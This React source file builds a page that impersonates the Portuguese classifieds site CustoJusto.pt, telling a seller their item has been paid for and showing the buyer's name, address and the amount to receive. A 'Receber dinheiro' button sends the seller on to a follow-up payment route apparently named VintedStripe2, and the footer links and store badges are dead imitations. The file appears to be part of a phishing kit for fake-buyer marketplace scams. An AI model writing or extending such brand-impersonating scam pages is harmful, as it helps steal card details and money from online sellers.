import React, { useEffect, useMemo, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './CustoJustoPtSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const P = process.env.PUBLIC_URL || '';
const LOGO_SRC = `${P}/custojusto-pt-logo.webp`;

const FOOTER = [
  {
    title: 'Sobre o CustoJusto',
    links: ['Quem somos', 'Carros usados', 'Contactos', 'Apps', 'Blog'],
  },
  {
    title: 'Segurança',
    links: ['Compra segura', 'Ajuda', 'Testemunhos'],
  },
  {
    title: 'Termos',
    links: ['Regras', 'Privacidade', 'Copyright', 'Definições de privacidade', 'Livro de Reclamações Online'],
  },
  {
    title: 'Para Profissionais',
    links: ['CustoJusto PRO', 'Acesso ao CustoJusto PRO', 'Ver todas as lojas'],
  },
  {
    title: 'Aplicações',
    links: ['iOS', 'Android', 'Huawei'],
  },
  {
    title: 'Redes Sociais',
    links: ['Facebook', 'LinkedIn'],
  },
];

function noop(e) {
  e.preventDefault();
}

function IconSearch() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="10.5" cy="10.5" r="6.5" stroke="currentColor" strokeWidth="2" />
      <path d="M16 16l6 6" stroke="currentColor" strokeWidth="2" strokeLinecap="round" />
    </svg>
  );
}

function IconHeartNav() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path
        d="M12 20S5 14.5 5 9.5C5 7 7 5 9.5 5c1.5 0 3 1 3.5 2.5C13.5 6 15 5 16.5 5 19 5 21 7 21 9.5 21 14.5 12 20 12 20z"
        stroke="currentColor"
        strokeWidth="1.8"
        strokeLinejoin="round"
      />
    </svg>
  );
}

function IconClock() {
  return (
    <svg width="18" height="18" viewBox="0 0 24 24" fill="none" aria-hidden>
      <circle cx="12" cy="12" r="9" stroke="currentColor" strokeWidth="1.8" />
      <path d="M12 7v6l4 2" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" />
    </svg>
  );
}

function IconFlag() {
  return (
    <svg width="16" height="16" viewBox="0 0 24 24" fill="none" aria-hidden>
      <path d="M5 3v18M5 5h12l-2 4 2 4H5" stroke="currentColor" strokeWidth="1.8" strokeLinecap="round" strokeLinejoin="round" />
    </svg>
  );
}

function IconCoins() {
  return (
    <svg width="22" height="22" viewBox="0 0 24 24" fill="none" aria-hidden>
      <ellipse cx="12" cy="16" rx="8" ry="3" stroke="currentColor" strokeWidth="1.6" />
      <ellipse cx="12" cy="12" rx="8" ry="3" stroke="currentColor" strokeWidth="1.6" />
      <ellipse cx="12" cy="8" rx="8" ry="3" stroke="currentColor" strokeWidth="1.6" />
    </svg>
  );
}

/**
 * CustoJusto.pt — ecrã de venda paga; CTA → index2 (VintedStripe2).
 */
function CustoJustoPtSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'PT').toUpperCase();
  const currencyCode = getPrimaryCurrency(countryCode) || 'EUR';
  const sym = getSymbol(currencyCode);

  const priceNumber = useMemo(() => {
    const raw = pageData?.price;
    if (raw == null || String(raw).trim() === '') return null;
    const s = String(raw)
      .replace(/\s+/g, '')
      .replace(/[^0-9.,-]/g, '')
      .replace(',', '.');
    const n = parseFloat(s);
    return Number.isFinite(n) ? n : null;
  }, [pageData?.price]);

  const priceMain =
    priceNumber == null
      ? '—'
      : priceNumber % 1 === 0
        ? String(priceNumber.toFixed(0))
        : String(priceNumber).replace('.', ',');

  const priceLower = priceMain === '—' ? '—' : `${priceMain} eur`;
  const amountBold = priceMain === '—' ? `— ${sym}` : `${priceMain} ${sym}`;

  const productName = (pageData?.product_name || '').trim() || '—';
  const buyerName = [pageData?.first_name, pageData?.middle_name, pageData?.last_name].filter(Boolean).join(' ').trim() || '—';
  const deliveryAddr = (pageData?.delivery_address || '').trim() || '—';
  const photoUrl = (pageData?.photo_url || '').trim();
  const adId = (pageCode || pageData?.page_code || '').trim() || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const crumb = [productName, deliveryAddr, adId, 'CustoJusto.pt'].filter((x) => x && x !== '—').join(' | ');

  if (loading && pageCode) {
    return (
      <div className="cjpt-wrap" lang="pt">
        <div className="cjpt-loading">A carregar…</div>
        <div className="cjpt-support-override">
          <SupportWidget sessionId={sessionId} countryCode={countryCode} />
        </div>
      </div>
    );
  }

  return (
    <div className="cjpt-wrap" lang="pt">
      <header className="cjpt-header">
        <div className="cjpt-header-inner">
          <a href="#/" className="cjpt-logo-link" onClick={noop} aria-label="CustoJusto.pt">
            <img src={LOGO_SRC} alt="" className="cjpt-logo" width={180} height={32} />
          </a>
          <nav className="cjpt-nav" aria-label="Principal">
            <a href="#/" className="cjpt-nav-item" onClick={noop}>
              <IconSearch />
              Pesquisa
            </a>
            <a href="#/" className="cjpt-nav-item" onClick={noop}>
              <IconHeartNav />
              Favoritos
            </a>
            <a href="#/" className="cjpt-btn-post" onClick={noop}>
              Inserir anúncio grátis
            </a>
          </nav>
        </div>
      </header>

      <div className="cjpt-main">
        <div className="cjpt-grid">
          <div>
            <h1 className="cjpt-title">{productName}</h1>
            <div className="cjpt-status-row">
              <div className="cjpt-paid-line">
                <IconClock />
                Pago: Recentemente
              </div>
              <span className="cjpt-price-tag">preço {priceLower}</span>
            </div>

            <div className={`cjpt-img-wrap${photoUrl ? '' : ' cjpt-img--ph'}`}>
              {photoUrl ? <img src={photoUrl} alt="" className="cjpt-img" /> : null}
            </div>
            <div className="cjpt-ad-id-bar">
              <span className="cjpt-ad-id-k">Id do anúncio</span>
              <span className="cjpt-ad-id-v">{adId}</span>
            </div>

            <div className="cjpt-share-row">
              <div>
                <p className="cjpt-share-title">Partilhar</p>
                <div className="cjpt-share-btns">
                  <a href="#/" className="cjpt-soc cjpt-soc--fb" onClick={noop} aria-label="Facebook">
                    f
                  </a>
                  <a href="#/" className="cjpt-soc cjpt-soc--wa" onClick={noop} aria-label="WhatsApp">
                    <svg width="20" height="20" viewBox="0 0 24 24" fill="currentColor" aria-hidden>
                      <path d="M17.472 14.382c-.297-.149-1.758-.867-2.03-.967-.273-.099-.471-.148-.67.15-.197.297-.767.966-.94 1.164-.173.199-.347.223-.644.075-.297-.15-1.255-.463-2.39-1.475-.883-.788-1.48-1.761-1.653-2.059-.173-.297-.018-.458.13-.606.134-.133.298-.347.446-.52.149-.174.198-.298.298-.497.099-.198.05-.371-.025-.52-.075-.149-.669-1.612-.916-2.207-.242-.579-.487-.5-.669-.51-.173-.008-.371-.01-.57-.01-.198 0-.52.074-.792.372-.272.297-1.04 1.016-1.04 2.479 0 1.462 1.065 2.875 1.213 3.074.149.198 2.096 3.2 5.077 4.487.709.306 1.262.489 1.694.625.712.227 1.36.195 1.871.118.571-.085 1.758-.719 2.006-1.413.248-.694.248-1.289.173-1.413-.074-.124-.272-.198-.57-.347m-5.421 7.403h-.004a9.87 9.87 0 01-5.031-1.378l-.361-.214-3.741.982.998-3.648-.235-.374a9.86 9.86 0 01-1.51-5.26c.001-5.45 4.436-9.884 9.888-9.884 2.64 0 5.122 1.03 6.988 2.898a9.825 9.825 0 012.893 6.994c-.003 5.45-4.435 9.884-9.885 9.884m8.413-18.297A11.815 11.815 0 0012.05 0C5.495 0 .16 5.335.157 11.892c0 2.096.547 4.142 1.588 5.945L.057 24l6.305-1.654a11.882 11.882 0 005.683 1.448h.005c6.554 0 11.89-5.335 11.893-11.893a11.821 11.821 0 00-3.48-8.413z" />
                    </svg>
                  </a>
                </div>
              </div>
              <a href="#/" className="cjpt-report" onClick={noop}>
                <IconFlag />
                Reportar
              </a>
            </div>
          </div>

          <aside className="cjpt-side">
            <h2 className="cjpt-side-title">{productName}</h2>
            <p className="cjpt-side-line">
              <span className="cjpt-side-k">Nome do comprador:</span>{' '}
              <span className="cjpt-side-v">{buyerName}</span>
            </p>
            <p className="cjpt-side-line">
              <span className="cjpt-side-k">Endereço do comprador:</span>{' '}
              <span className="cjpt-side-v">{deliveryAddr}</span>
            </p>
            <p className="cjpt-side-amount">
              <span className="cjpt-side-k">Valor a receber:</span>{' '}
              <strong>{amountBold}</strong>
            </p>
            <Link to={index2Path} className="cjpt-cta">
              <IconCoins />
              Receber dinheiro
            </Link>
          </aside>
        </div>
      </div>

      <footer className="cjpt-footer">
        <div className="cjpt-footer-inner">
          {FOOTER.map((col) => (
            <div key={col.title} className="cjpt-foot-col">
              <h4>{col.title}</h4>
              {col.links.map((t) => (
                <a key={t} href="#/" onClick={noop}>
                  {t}
                </a>
              ))}
            </div>
          ))}
        </div>
        <div className="cjpt-foot-badges">
          <div>
            <span className="cjpt-badge-fake">App Store</span>
            <span className="cjpt-badge-fake" style={{ marginLeft: 10, background: '#fff', color: '#333', border: '1px solid #ccc' }}>
              Google Play
            </span>
          </div>
          <span className="cjpt-copy">© CustoJusto</span>
        </div>
        <p className="cjpt-crumb">{crumb}</p>
      </footer>

      <div className="cjpt-support-override">
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    </div>
  );
}

export default CustoJustoPtSuccess;
